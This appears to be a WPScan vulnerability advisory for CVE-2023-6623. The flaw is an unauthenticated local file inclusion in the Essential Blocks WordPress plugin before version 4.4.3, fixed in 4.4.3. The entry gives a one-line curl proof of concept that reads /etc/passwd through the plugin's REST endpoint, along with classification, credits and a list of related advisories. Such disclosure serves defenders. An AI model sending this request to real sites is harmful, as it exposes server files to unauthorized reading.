WordPress Plugin Vulnerabilities

Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion

Description

The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.

Proof of Concept

curl --url 'http://vulnerable-site.tld/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D'

Affects Plugins

Plugin icon
essential-blocks
Fixed in 4.4.3

References

CVE
CVE-2023-6623
URL
https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/

Classification

Type
LFI
OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher
Marc Montpas
Submitter
Marc Montpas
Submitter website
https://wpscan.com
Submitter twitter
marcS0H
Verified
Yes
WPVDB ID
633c28e0-0c9e-4e68-9424-55c32789b41f

Timeline

Publicly Published
2023-12-21 (about 4 months ago)
Added
2023-12-21 (about 4 months ago)
Last Updated
2023-12-21 (about 4 months ago)

Other

Published
Title
Published
2014-08-01
Title
Ajax Pagination 1.1 - wp-admin/admin-ajax.php loop Parameter Local File Inclusion
Published
2014-08-01
Title
Vitamin 1.0 - add_headers.php path Parameter Traversal Arbitrary File Access
Published
2014-08-01
Title
Page Flip Image Gallery <= 0.2.2 - Remote FD Vuln
Published
2015-07-18
Title
wptf-image-gallery 1.0.3 - Remote File Download
Published
2023-12-27
Title
JVM rich text icons < 1.2.7 - Subscriber+ Arbitrary File Deletion